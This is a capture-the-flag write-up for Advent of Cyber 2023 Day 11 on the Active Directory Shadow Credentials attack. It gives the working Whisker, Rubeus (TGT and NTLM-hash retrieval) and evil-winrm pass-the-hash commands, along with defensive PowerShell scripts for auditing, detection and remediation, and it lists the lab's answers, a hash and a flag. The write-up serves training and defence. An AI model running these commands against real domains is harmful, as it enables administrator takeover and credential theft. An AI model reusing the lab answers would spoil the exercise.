Day 11 of Advent of Cyber 2023!

Back story:

AntarctiCrafts' technology stack had a distinct specialization in cutting-edge climate research, with less emphasis on robust cybersecurity measures. As the integration of the two infrastructure systems advances, vulnerabilities are emerging. Despite AntarctiCrafts' team demonstrating remarkable expertise, their small size necessitates a heightened focus on cybersecurity awareness.

In the ongoing audit, it's evident that some users still possess excessive permissions. While many of these instances were addressed in the previous audit, the question remains: Are all issues now resolved from the perspective of the HR user?

Learning Objectives

  • Understanding Active Directory

  • Introduction to Windows Hello for Business

  • Prerequisites for exploiting GenericWrite privilege

  • How the Shadow Credentials attack works

  • How to exploit the vulnerability

Understanding Active Directory (AD):

Active Directory (AD) is like a digital manager for businesses using Windows. It's a central hub that controls who can access what in a network. The Domain Controller (DC) is the core of AD, managing user information, authentication, and permissions.

Think of AD as a digital database of users, groups, and computers, each with its own settings and permissions. It is meant to follow the principle of least privilege, giving users access only to what they need; when permissions aren't managed well, excess rights on the wrong object become a security risk.

Windows Hello for Business (WHfB):

WHfB is a modern way to log in that replaces traditional passwords with cryptographic keys. The private key stays on the user's device, while the matching public key is stored in AD on the user object, in an attribute called msDS-KeyCredentialLink.

Authentication Process:

  1. Authorisation: DC decrypts pre-authentication data using the public key.

  2. Certificate generation: DC creates a certificate for the user.

  3. Authentication: User logs in using the certificate.

Enumeration (Checking Permissions):

To ensure security, we need to check whether users hold more permissions than they should. The PowerView PowerShell script helps with this: its Find-InterestingDomainAcl function lists non-standard ACL entries in the domain. Focus on finding any write privileges.

cd C:\Users\hr\Desktop
powershell -ep bypass
. .\PowerView.ps1
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights
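The PowerView query above reports every interesting ACE for "hr". As an added example (not part of the room or of PowerView), the script below does the same check from the defender's side with the RSAT ActiveDirectory module only: for the built-in Administrator and every nested member of Domain Admins it reports any ACE that gives an unexpected trustee a takeover right (GenericAll, GenericWrite, WriteDacl, WriteOwner) or WriteProperty scoped to msDS-KeyCredentialLink. It assumes the module is installed and the session can read the objects' security descriptors; the expected-trustee list is constructed for this page and should be adjusted to the environment.

```powershell
# Added example: ACL audit over privileged accounts with the RSAT ActiveDirectory module.
# Assumed: module installed, rights to read security descriptors, domain AOC.local.
Import-Module ActiveDirectory

$ADRights = [System.DirectoryServices.ActiveDirectoryRights]

# Look up the schemaIDGUID of msDS-KeyCredentialLink instead of hard-coding it, so the
# attribute-scoped WriteProperty check below is correct in any forest.
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$kclAttr  = Get-ADObject -SearchBase $schemaNC -LDAPFilter '(lDAPDisplayName=msDS-KeyCredentialLink)' -Properties schemaIDGUID
$kclGuid  = [guid]$kclAttr.schemaIDGUID

# Rights that allow a full takeover of the object (and therefore a shadow-credential write).
$takeover = @($ADRights::GenericAll, $ADRights::GenericWrite, $ADRights::WriteDacl, $ADRights::WriteOwner)

# Trustees expected to hold such rights on privileged accounts (constructed list); others are reported.
$netbios  = (Get-ADDomain).NetBIOSName
$expected = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
              "$netbios\Domain Admins", "$netbios\Enterprise Admins")

function Get-RiskyAce {
    # Returns one record per ACE on $Identity that lets an unexpected trustee write to it.
    param([Parameter(Mandatory)][string]$Identity)

    $obj = Get-ADUser -Identity $Identity
    $acl = Get-Acl -Path "AD:\$($obj.DistinguishedName)"

    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($expected -contains $ace.IdentityReference.Value) { continue }

        $rights = $ace.ActiveDirectoryRights

        # Flags check: the ACE grants every bit of one of the takeover rights.
        $hasTakeover = $false
        foreach ($r in $takeover) {
            if (($rights -band $r) -eq $r) { $hasTakeover = $true }
        }

        # WriteProperty is enough when it covers all properties (empty ObjectType)
        # or is scoped to msDS-KeyCredentialLink itself.
        $writesKcl = (($rights -band $ADRights::WriteProperty) -eq $ADRights::WriteProperty) -and
                     ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $kclGuid)

        if ($hasTakeover -or $writesKcl) {
            $scope = 'other'
            if ($ace.ObjectType -eq $kclGuid)       { $scope = 'msDS-KeyCredentialLink' }
            elseif ($ace.ObjectType -eq [guid]::Empty) { $scope = 'all properties' }

            [pscustomobject]@{
                Target    = $obj.SamAccountName
                Trustee   = $ace.IdentityReference.Value
                Rights    = $rights
                Scope     = $scope
                Inherited = $ace.IsInherited
            }
        }
    }
}

# Review the built-in Administrator plus every (nested) member of Domain Admins.
$targets = @('Administrator') +
           (Get-ADGroupMember -Identity 'Domain Admins' -Recursive | Select-Object -ExpandProperty SamAccountName)
$targets | Sort-Object -Unique | ForEach-Object { Get-RiskyAce -Identity $_ } | Format-Table -AutoSize
```

Run it from a domain-joined admin workstation; in the room's scenario the "hr" entry with GenericWrite on Administrator is exactly the kind of row it prints. The bitwise comparison matters: GenericWrite is a composite mask, so matching on the rendered string alone can miss ACEs that carry its bits under other names.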

Exploitation: Shadow Credentials Attack

  1. Find a user with GenericWrite privilege (e.g., "hr" on "Administrator").

  2. Use the Whisker tool to simulate enrolling a malicious device:

.\Whisker.exe add /target:Administrator

  3. Whisker provides a certificate. Use the Rubeus tool to request a Ticket Granting Ticket (TGT) for the user with that certificate:

.\Rubeus.exe asktgt /user:Administrator /certificate:<CertificateGenerated> /password:"<GeneratedPassword>" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

Exploit McRed:

With the NTLM hash obtained in the previous step (the /getcredentials option makes Rubeus print it), use Evil-WinRM for remote access.

evil-winrm -i MACHINE_IP -u Administrator -H <NTLMHash>

Now, you can access the system remotely and retrieve the flag:

more C:\Users\Administrator\Desktop\flag.txt

Remember to replace placeholders like <CertificateGenerated>, <GeneratedPassword>, <NTLMHash>, and MACHINE_IP with the actual values.
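The attack above leaves one durable trace: a new value in the target's msDS-KeyCredentialLink, written by an account that is not the user's own device enrolment. As an added example (not part of the room), the script below covers detection and response for that attribute with the RSAT ActiveDirectory module: it lists privileged accounts (adminCount=1) that carry key credentials, pulls Directory Service Changes events (ID 5136) from the domain controller for writes to that attribute, and clears the attribute on one account behind a -WhatIf/-Confirm guard. It assumes the DC name from this room (southpole.AOC.local), rights to read its Security log, and that "Audit Directory Service Changes" together with a Write-Property SACL on the monitored objects is enabled, without which no 5136 event is logged.

```powershell
# Added example: detect and remove shadow credentials on privileged accounts.
# Assumed: RSAT ActiveDirectory module; Security log readable on the DC
# (southpole.AOC.local from this room); directory-change auditing enabled.
Import-Module ActiveDirectory

function Get-PrivilegedKeyCredential {
    # Privileged accounts (adminCount=1) that have at least one value in
    # msDS-KeyCredentialLink. Legitimate WHfB enrolment also writes here, so each hit
    # must be matched against a known enrolment; unexplained values are the signal.
    Get-ADUser -LDAPFilter '(&(adminCount=1)(msDS-KeyCredentialLink=*))' -Properties 'msDS-KeyCredentialLink' |
        ForEach-Object {
            [pscustomobject]@{
                SamAccountName = $_.SamAccountName
                KeyCount       = @($_.'msDS-KeyCredentialLink').Count
                DN             = $_.DistinguishedName
            }
        }
}

function Get-KeyCredentialChange {
    # Directory Service Changes events (ID 5136) where the modified attribute is
    # msDS-KeyCredentialLink: who wrote it, on which object, and when.
    param([string]$DomainController = 'southpole.AOC.local', [int]$Hours = 24)

    $filter = @{ LogName = 'Security'; Id = 5136; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -ComputerName $DomainController -FilterHashtable $filter -ErrorAction SilentlyContinue |
        ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
            if ($data['AttributeLDAPDisplayName'] -ne 'msDS-KeyCredentialLink') { return }

            # OperationType is a message parameter: %%14674 = Value Added, %%14675 = Value Deleted.
            $op = switch ($data['OperationType']) {
                '%%14674' { 'ValueAdded' }
                '%%14675' { 'ValueDeleted' }
                default   { $data['OperationType'] }
            }
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Actor     = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
                Target    = $data['ObjectDN']
                Operation = $op
            }
        }
}

function Clear-KeyCredentialLink {
    # Remediation: remove every value of msDS-KeyCredentialLink on one account.
    # Supports -WhatIf / -Confirm because this also revokes any legitimate WHfB keys.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory)][string]$Identity)

    $user = Get-ADUser -Identity $Identity
    if ($PSCmdlet.ShouldProcess($user.DistinguishedName, 'Clear msDS-KeyCredentialLink')) {
        Set-ADObject -Identity $user.DistinguishedName -Clear 'msDS-KeyCredentialLink'
    }
}

# Hunt: a low-privilege actor (in this room, "hr") adding a value on a privileged account.
Get-PrivilegedKeyCredential | Format-Table -AutoSize
Get-KeyCredentialChange -Hours 72 |
    Where-Object { $_.Operation -eq 'ValueAdded' } |
    Format-Table -AutoSize

# Response, once the value is confirmed to be unauthorised (drop -WhatIf to apply):
# Clear-KeyCredentialLink -Identity Administrator -WhatIf
```

Clearing the attribute invalidates the certificate Whisker obtained, but it does not revoke tickets already issued or undo the password reset Rubeus's /getcredentials makes possible, so rotating the Administrator password and removing the GenericWrite grant found during enumeration are still required. The actual fix for the audit finding is the ACL, not the attribute.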

Task 1:

What is the hash of the vulnerable user?

Answer: 03E805D8A8C5AA435FB48832DAD62

Task 2:

What is the content of flag.txt on the Administrator Desktop?

Answer: THM{XMAS_IS_SAFE}